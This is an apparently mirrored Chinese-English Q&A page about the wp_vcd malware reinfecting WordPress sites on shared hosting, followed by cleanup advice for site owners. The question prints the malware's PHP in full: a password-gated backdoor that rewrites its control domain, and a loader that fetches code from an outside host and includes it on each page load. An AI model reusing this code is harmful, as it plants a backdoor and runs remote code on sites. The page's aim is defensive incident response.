我的共享主机上所有 wordpress 网站的 functions.php 中的 PHP 代码 [英] PHP code in functions.php of all wordpress websites on my shared hosting

问题描述

我有一个共享主机和一些 wordpress 网站.最近有时当我访问我的网站时，弹出窗口会打开.所以我在Cpanel中打开了一个wordpress网站的模板目录.此代码添加到 functions.php 文件的顶部:

I have a shared hosting and some wordpress websites on that. Recently sometimes when I visit my websites, popup opens. So I opened template directory of one wordpress website in Cpanel. this code was added on top of functions.php file:

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
    {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action'])
        {
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
        {
        if (!empty($_REQUEST['newdomain']))
            {
            if ($file = @file_get_contents(__FILE__))
                {
                if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))
                    {
                    $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                    }
                }
            }
        }

    break;

default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

die("");
}

if (!function_exists('theme_temp_setup'))
    {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
        {
        if ($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=" . $path))
            {
            function theme_temp_setup($phpCode)
                {
                $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;

                unlink($tmpfname);
                return get_defined_vars();
                }

            extract(theme_temp_setup($tmpcontent));
            }
        }
    }

?>

所以我 deteled 和弹出问题解决了.我从所有网站的 functions.php 文件中删除了它 但是现在的问题是，当我访问任何网站的 functions.php 时，代码又出现了，并且它在所有主题中甚至未使用的主题中.我能做什么?

So I deteled that and popup problem solved. I deleted that from functions.php files of all websites But Now problem is that when I visit functions.php of any websites, the code is there again and its in all themes even unused themes. What can I do?

我做了什么来解决问题

1. 在wp-include目录下，删除wp-vcd.php和class.wp.php文件
2. 在 wp-include 目录中，打开 post.php 并删除第一个 php 标签由恶意软件添加.
3. 打开主题的functions.php文件，删除上面的代码.

1. In wp-include directory, delete wp-vcd.php and class.wp.php files
2. In wp-include directory, open post.php and detele first php tag added by Malware.
3. Open to theme's functions.php file, and delete the above codes.

这应该会停止弹出窗口.但我现在不知道它能用多久.

This should stop popups. But I don't now how long it works.

我仍然没有找到感染所有网站的主文件，但正在寻找.

I still didn't find the main file that infect all websites, but tying to find out.

推荐答案

我知道这个答案很晚了，但我会分享我的经验以帮助任何遇到此问题的人.此问题的原因可能是您从 wordpress.org 外部下载的插件，或者某些机构可以访问您的 wordpress 管理员帐户，并且您尚未在外观选项卡中关闭 editor.php 或黑客拥有您的 ftp 用户和密码或 ...要解决此问题，请先创建完整备份并将其保存在您的计算机中，以防万一出错，然后:

I know this answer is very late but I'll share my experience to help any one who has this problem. cause of this issue can be a plugin that you downloaded from outside of wordpress.org or some body has access to your wordpress admin account and you doesn't already close editor.php in appearance tab or hacker has your ftp user and password or ... to solve this create a full backup first and save it in your computer in case of doing any mistake and then:

1. 转到您的 wordpress 站点的主题目录并删除所有未使用的主题，因为它们已被感染.
2. 在活动主题中编辑您的 functions.php 文件并删除恶意软件插入的所有额外代码.您可以搜索 wp_vcd 或 wp-tmp 词来查找代码.
3. 下载最新的 wordpress 安装.然后删除wp-include和wp-admin文件夹和public_html中除了wp-content文件夹和.htaccess 文件和 wp-config.php 文件.之后，用下载的 wordpress 替换已删除的文件和文件夹.
4. 删除您从已知来源下载的所有插件.
5. 最后更改您的所有密码，例如 ftp、管理面板、cpanel 或直接管理员以及...以防黑客将您的信息保存在某处.

1. go to theme directory of your wordpress site and delete all of the unused theme because they are infected already.
2. in active theme edit your functions.php file and delete all extra code inserted by malware. you can search for wp_vcd or wp-tmp words to find the code.
3. download latest wordpress installation. then delete wp-include and wp-admin folder and all files in public_html except wp-content folder and .htaccess file and wp-config.php file. after that replace deleted files and folder with downloaded wordpress.
4. remove all plugins that you downloaded from known source.
5. finally change all of your passwords like ftp, admin panel, cpanel or direct admin and ... in case if hacker saved your info somewhere.

希望这个小指南可以帮助某人.

hope this little guide can help someone.

这篇关于我的共享主机上所有 wordpress 网站的 functions.php 中的 PHP 代码的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！